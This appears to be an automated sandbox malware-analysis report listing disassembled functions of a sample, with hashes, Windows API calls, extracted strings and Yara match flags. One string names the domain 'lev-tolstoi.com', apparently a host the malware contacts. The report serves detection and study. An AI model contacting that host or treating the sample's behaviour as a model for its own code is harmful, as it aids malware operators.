Opcode Fuzzy Hash: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
Instruction Fuzzy Hash: D9A212366083009FE728DF64C891BAABBE3EBC5314F19882DE5D587352D775D806DB82

Function 0041A150 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1622COMMON

Download Yara Rule

APIs

Part of subcall function 0043C330: LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E

FreeLibrary.KERNEL32(?), ref: 0041A7FA
FreeLibrary.KERNEL32(?), ref: 0041A89B

Strings

N@, xrefs: 0041A61A
I,~M, xrefs: 0041B203
AB, xrefs: 0041A622

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: AB$I,~M$N@
API String ID: 764372645-1338355008
Opcode ID: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
Instruction ID: e1ca4a59bde15fa5924e3eed146bb9730fe9803e238724338574477127e3de75
Opcode Fuzzy Hash: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
Instruction Fuzzy Hash: ACA255352493009FD724DB24C881BABBBE3EBC5314F19C82EE5D587352D779D8868B86

Function 00423A2A Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

AF, xrefs: 00423E7B
IK, xrefs: 00423AB6
EG, xrefs: 00423AAF
stu, xrefs: 00423C2C

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: AF$EG$IK$stu
API String ID: 0-1635301703
Opcode ID: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
Instruction ID: 39eb04832eb88fb9aa3c4d3716742c09fe3224a1bca5495eee59028efd12266c
Opcode Fuzzy Hash: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
Instruction Fuzzy Hash: 75D168B5E00211DFDB10CF64D882A6BBB71FF46315F1581A9E941AF352E738A901CF99

Function 00422F0D Relevance: 8.1, Strings: 6, Instructions: 628COMMON

Download Yara Rule

Strings

066&, xrefs: 00422FB3
3B, xrefs: 0042332B, 004233D7
.1&*, xrefs: 00423030, 00423098
'#%;, xrefs: 00422FA3
0~#/, xrefs: 00422FAB
_F, xrefs: 0042301B

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: '#%;$.1&*$066&$0~#/$_F$3B
API String ID: 0-1609436745
Opcode ID: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
Instruction ID: 7ea3dd8e245a26d41854b7de1f2706448979532b446e58bce8047c1e76753e38
Opcode Fuzzy Hash: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
Instruction Fuzzy Hash: E6120D75608211DFE714CF28E89172BB7E2FB8A315F59893CE88297291D738ED11CB46

Function 00628837 Relevance: 7.7, APIs: 5, Instructions: 170threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0062885B
GetCurrentThreadId.KERNEL32 ref: 00628865
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0062897A
GetForegroundWindow.USER32 ref: 0062898F

Part of subcall function 0062B627: FreeLibrary.KERNEL32(00628A45), ref: 0062B62D
Part of subcall function 0062B627: FreeLibrary.KERNEL32 ref: 0062B64E

ExitProcess.KERNEL32 ref: 00628A4C

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 3676751680-0
Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
Instruction ID: 083e8c0f88bd87d1e220aed4bf80b3c1b2b83cfaaac5d59264afbebdecea587f
Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
Instruction Fuzzy Hash: D6511577E547280BC318AEB99C8636ABAC65BC4710F0E813DAD89DB391EDB89C4546C4

Function 0041CA70 Relevance: 6.9, Strings: 5, Instructions: 626COMMON

Download Yara Rule

Strings

HI, xrefs: 0041CEC5
+, xrefs: 0041CCDD
4l/n, xrefs: 0041D104, 0041D19F
AC, xrefs: 0041CEB5
EG, xrefs: 0041CEBD

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: +$4l/n$HI$AC$EG
API String ID: 0-2131502145
Opcode ID: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
Instruction ID: a4ec15649f5ce789aa249a628662369405bf800bf02bbfe84a00a1b55f3e5535
Opcode Fuzzy Hash: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
Instruction Fuzzy Hash: B21233B650C3509BC704DF65CC926ABBBE2EF82314F08886DF4C58B391E7399945CB96

Function 0063140D Relevance: 6.8, Strings: 5, Instructions: 541COMMON

Download Yara Rule

Strings

`, xrefs: 00631921
m, xrefs: 00631420
x, xrefs: 0063191C
', xrefs: 00631649
., xrefs: 006317DB

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: '$.$`$m$x
API String ID: 0-658611574
Opcode ID: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
Instruction ID: 21bace57762190273eecae8169b552abcbc8f1532d9e7f58c38dc2e4e11f87d4
Opcode Fuzzy Hash: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
Instruction Fuzzy Hash: 6E22E97150D7908BC7649F3884953AEBBE2AFD6324F194E2ED4D98B3D1D77488028B83

Function 004111A6 Relevance: 6.8, Strings: 5, Instructions: 541COMMON

Download Yara Rule

Strings

`, xrefs: 004116BA
', xrefs: 004113E2
x, xrefs: 004116B5
., xrefs: 00411574
m, xrefs: 004111B9

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: '$.$`$m$x
API String ID: 0-658611574
Opcode ID: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
Instruction ID: 2144aee67b07277a24bb181582e3d7a2e9ec39ed2a6ddb42bc05191b79a9b14a
Opcode Fuzzy Hash: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
Instruction Fuzzy Hash: 1522F67250C7908BC7249F3884913EFBBE1ABD5324F194A2FE5E9973E1D67888418B47

Function 006293B7 Relevance: 6.7, Strings: 5, Instructions: 441COMMON

Download Yara Rule

Strings

$869, xrefs: 006294CA
yx, xrefs: 00629565
2841, xrefs: 006294D2
<5%", xrefs: 00629412
LG, xrefs: 00629422

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: $869$2841$<5%"$LG$yx
API String ID: 0-1687199681
Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
Instruction ID: 74686e673ce6aed15baafe50496396cbb3d025c0329958b787fa23da0fe89279
Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
Instruction Fuzzy Hash: 08C1347160C7914FD7258F29D4507ABBFE2ABD3304F1889ADE4D59B382C679C806CB62

Function 00409150 Relevance: 6.7, Strings: 5, Instructions: 441COMMON

Download Yara Rule

Strings

$869, xrefs: 00409263
yx, xrefs: 004092FE
LG, xrefs: 004091BB
2841, xrefs: 0040926B
<5%", xrefs: 004091AB

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $869$2841$<5%"$LG$yx
API String ID: 0-1687199681
Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
Instruction ID: 6e29797cb701a68307395225b6e7be505ceeebb86d1407f7b9dd9bd878f88501
Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
Instruction Fuzzy Hash: 82C1247260C3914BD7158E29C4503ABBFE2ABD6204F18897EE8D59B3C3C67DC806C766

Function 00426A30 Relevance: 6.7, Strings: 5, Instructions: 423COMMON

Download Yara Rule

Strings

$XZ, xrefs: 00426AD7
\^, xrefs: 00426ADF
6t2v, xrefs: 00426AAF
TV, xrefs: 00426AEF
k, xrefs: 00426BED

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: $XZ$6t2v$k$TV$\^
API String ID: 0-467934898
Opcode ID: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
Instruction ID: b605e89531a81705ebfe3af5fac37aee9194eb61735b639e3b3a85eadae14b77
Opcode Fuzzy Hash: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
Instruction Fuzzy Hash: B5E1F0B5608340DFE7209F14EC81B6FB7E0FB8A304F55892DE6C59B2A1DB359815CB4A

Function 0062AB27 Relevance: 6.6, Strings: 5, Instructions: 384COMMON

Download Yara Rule

Strings

@G, xrefs: 0062AC21
/ , xrefs: 0062ACA7
xA, xrefs: 0062AC29
$>, xrefs: 0062ADAB
$>, xrefs: 0062AD7B, 0062AF19, 0062AF22, 0062AF54

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: $>$$>$/ $@G$xA
API String ID: 0-3945432221
Opcode ID: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
Instruction ID: 92a2b0fd1a308d5614b9f9308877be243c7e82ffcc256801197e534459cbe488
Opcode Fuzzy Hash: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
Instruction Fuzzy Hash: 2BB1F4B560C7618BC324CF5894906EBBBE3DFC2704F58496CE8D55B351C6BA890ADB83

Function 00409600 Relevance: 6.6, Strings: 5, Instructions: 348COMMON

Download Yara Rule

Strings

XO, xrefs: 0040988A
C7E99BE82D116EAC25E054D164A37606, xrefs: 004096B6
,-, xrefs: 00409912
"7-0, xrefs: 00409795
0, xrefs: 00409802

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "7-0$,-$0$C7E99BE82D116EAC25E054D164A37606$XO
API String ID: 0-4160216451
Opcode ID: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
Instruction ID: b14e87bd0a1771ab9c69b1f7aba9e5e6c348a9572cac4b455d4e49c452734ab2
Opcode Fuzzy Hash: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
Instruction Fuzzy Hash: 4FB1E5B16083409BD718DF25D8519AFBBE6EBC2314F14892DE0D69B382D738D50ACB5A

Function 00423FA0 Relevance: 6.6, Strings: 5, Instructions: 300COMMON

Download Yara Rule

Strings

A%g', xrefs: 00424065
rBB, xrefs: 00424262
Q5j7, xrefs: 00423FCA
bBB, xrefs: 0042424F
`a, xrefs: 00424026

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: A%g'$Q5j7$`a$bBB$rBB
API String ID: 0-1327514492
Opcode ID: 11854e9d01787bcabf0a5723583f3a9d661c6e82951057df82fbc47dee04596a
Instruction ID: 84e825f8253b53e153d6fc107475a3046bb70845801fbe9f3bd419ebf7740313
Opcode Fuzzy Hash: 11854e9d01787bcabf0a5723583f3a9d661c6e82951057df82fbc47dee04596a
Instruction Fuzzy Hash: EB9100B5A083409FD714CF28E84175BBBE0FBCA708F508A2DF5959B382D774A905CB86

Function 00629157 Relevance: 6.5, Strings: 5, Instructions: 251COMMON

Download Yara Rule

Strings

+, xrefs: 0062920A
xs, xrefs: 006291A3
40, xrefs: 00629174
+, xrefs: 0062917B
c, xrefs: 0062922A

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: +$40$c$xs$+
API String ID: 0-1069988977
Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
Instruction ID: 8a803f0ec28ec7917b98725d08e044c0251894c192a6a25fa2befa6ef4d95f85
Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
Instruction Fuzzy Hash: 6A61012154D3D28AD301CF7994D07AAFFE1AFE3344F18456DE8D04B382D36A890ADB66

Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 251COMMON

Download Yara Rule

Strings

40, xrefs: 00408F0D
xs, xrefs: 00408F3C
+, xrefs: 00408FA3
+, xrefs: 00408F14
c, xrefs: 00408FC3

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: +$40$c$xs$+
API String ID: 0-1069988977
Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
Instruction ID: 337f816b89ebe18a5921aad55b72e827079c057bc6ea50a272954d896ed24b54
Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
Instruction Fuzzy Hash: D461F22154D3D28AE3019F79949036BFFE0AFA3350F18456EE8D41B382D77A890AD766

Function 0063E9F7 Relevance: 5.9, Strings: 4, Instructions: 901COMMON

Download Yara Rule

Strings

&[da, xrefs: 0063F0D7
'%.W, xrefs: 0063ED70
\X, xrefs: 0063ECBF
"=$5, xrefs: 0063ED5A

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: "=$5$&[da$'%.W$\X
API String ID: 0-3996675343
Opcode ID: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
Instruction ID: e81b5fbb075023e2d11637de068fed31347ed02f3026c6dd24923608faed7a35
Opcode Fuzzy Hash: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
Instruction Fuzzy Hash: D662187190C3918FC725CF2888906AEBFE2AF95314F18867CE4E55B392D7368906C7D6

Function 0041E790 Relevance: 5.9, Strings: 4, Instructions: 901COMMON

Download Yara Rule

Strings

\X, xrefs: 0041EA58
&[da, xrefs: 0041EE70
'%.W, xrefs: 0041EB09
"=$5, xrefs: 0041EAF3

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "=$5$&[da$'%.W$\X
API String ID: 0-3996675343
Opcode ID: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
Instruction ID: 1f7b9d891a837fd2c1889f1d16761606eef6dcf163077f6c21b04c916aa521c0
Opcode Fuzzy Hash: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
Instruction Fuzzy Hash: E662597450C3919BC321CF25C8506ABBFE1AF95314F1887BEE8E44B392D7398946C796

Function 0064DDE6 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 498COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0064DECF

Strings

uHHs, xrefs: 0064DFDA
_, xrefs: 0064E3A5

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: _$uHHs
API String ID: 3664257935-2879388440
Opcode ID: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
Instruction ID: 94e3f9646a3e7dede31c12d7f3f2953ccd7ea73452273de17cd016bd47784254
Opcode Fuzzy Hash: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
Instruction Fuzzy Hash: EED1B2605183D08AD7358F3984A07FBBBE1AFA3305F0849ADD4D98B782D7794509CB63

Function 0042DB7F Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 498COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042DC68

Strings

_, xrefs: 0042E13E
uHHs, xrefs: 0042DD73

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: FreeLibrary
String ID: _$uHHs
API String ID: 3664257935-2879388440
Opcode ID: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
Instruction ID: 657a4d5abfb12f1dc895d1f067591f20c39952d2f974751b242cefe10b9506bf
Opcode Fuzzy Hash: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
Instruction Fuzzy Hash: 24D1D3606187E08AD7358F3994A07BBBBD1AFA7304F5849AED4C98B382C7394505CB57

Function 004339F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00433A3E
GetSystemMetrics.USER32 ref: 00433A4D

Strings

, xrefs: 00433B21

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
Instruction ID: 9919e99d947470de0ad43a1edc8932ab1666953d7c59876c21ae7e6382b5c0c6
Opcode Fuzzy Hash: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
Instruction Fuzzy Hash: 735161B4E152189FDB40EFACD98569DBBF0BB88300F114529E498E7360D734AD84CF96

Function 00629867 Relevance: 5.3, Strings: 4, Instructions: 348COMMON

Download Yara Rule

Strings

XO, xrefs: 00629AF1
"7-0, xrefs: 006299FC
0, xrefs: 00629A69
,-, xrefs: 00629B79

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: "7-0$,-$0$XO
API String ID: 0-3383152870
Opcode ID: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
Instruction ID: 43f0d06a40e1239af7b15f0b7a54766c383bed8bab3728c5b9ef67b19b65493d
Opcode Fuzzy Hash: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
Instruction Fuzzy Hash: 6BB1E4B12087909BD718CF2598959AFBBE6EFC2314F14896DF0D68B381D639C50ACB16

Function 0062E16B Relevance: 5.3, Strings: 4, Instructions: 339COMMON

Download Yara Rule

Strings

E5E1, xrefs: 0062E4CD
255B, xrefs: 0062E4D8
8A23, xrefs: 0062E4C2
C566, xrefs: 0062E4B7

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: 255B$8A23$C566$E5E1
API String ID: 0-3367982953
Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
Instruction ID: 5e9dd08e8fa30ca76e119342c46213e5113194a7781967697b8c014c1a0b5d1d
Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
Instruction Fuzzy Hash: A5A1FC6165979247E334CB259C92BEBB7D2EFD2214F088A7CD4D897792E2384802D792

Function 0040DF04 Relevance: 5.3, Strings: 4, Instructions: 339COMMON

Download Yara Rule

Strings

C566, xrefs: 0040E250
E5E1, xrefs: 0040E266
8A23, xrefs: 0040E25B
255B, xrefs: 0040E271

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: 255B$8A23$C566$E5E1
API String ID: 0-3367982953
Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
Instruction ID: c9ab22a39130a17e05ee61a651d87010c03896c5afd99520b9bc1921e18da37f
Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
Instruction Fuzzy Hash: 03A12B316593924BD3348B258C91BEBBBE1EBD2314F088A7DD4D897792F73848069792

Function 0063D08A Relevance: 5.3, Strings: 4, Instructions: 338COMMON

Download Yara Rule

Strings

4l/n, xrefs: 0063D36B, 0063D406
AC, xrefs: 0063D11C
HI, xrefs: 0063D12C
EG, xrefs: 0063D124

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: 4l/n$HI$AC$EG
API String ID: 0-4032564853
Opcode ID: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
Instruction ID: 93beb1f0da716d26564e6e07f8571dca7cceb83dc40d4afe957b33b8e86ea5ad
Opcode Fuzzy Hash: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
Instruction Fuzzy Hash: 8691F2B56183508BCB18DF28DC926ABB7E2EF95314F08996CE895CB391E734D904C792

Function 0042822E Relevance: 5.3, Strings: 4, Instructions: 270COMMON

Download Yara Rule

Strings

IK, xrefs: 0042850E
MO, xrefs: 00428516
AC, xrefs: 004284FE
XY, xrefs: 00428532

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: XY$AC$IK$MO
API String ID: 0-664538580
Opcode ID: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
Instruction ID: 39428194e500b5a53c6aae23f15327502ea0c60e828c0b8a3651ea1546d1f37d
Opcode Fuzzy Hash: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
Instruction Fuzzy Hash: 9A8124B6A09310DFD7109F25E84172FB7E1ABC5304F154A3EE98597381EB38E9058B8B

Function 0062D387 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 312COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0062D39A

Strings

D, xrefs: 0062D3AF
lev-tolstoi.com, xrefs: 0062D79E

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: D$lev-tolstoi.com
API String ID: 3861434553-4021809485
Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
Instruction ID: a6037717e57894e06413b59802cc486b4cafe9f5884fd51470d7e67397265cce
Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
Instruction Fuzzy Hash: 11A1EEB51093E28FD335CF2594A0BEABBE2ABD6304F0889ACD0D54B751D7754906CF92

Function 0040D120 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 312COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040D133

Strings

D, xrefs: 0040D148
lev-tolstoi.com, xrefs: 0040D537

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Uninitialize
String ID: D$lev-tolstoi.com
API String ID: 3861434553-4021809485
Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
Instruction ID: db83cc6d0157fc327276ba6685622738ae1c34c2f9734926ad1cda59646cf540
Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
Instruction Fuzzy Hash: 8BA110B55083928FD335CF2584A07EBBBE1AFD6300F0889ADD0D95B392D775490ACB96

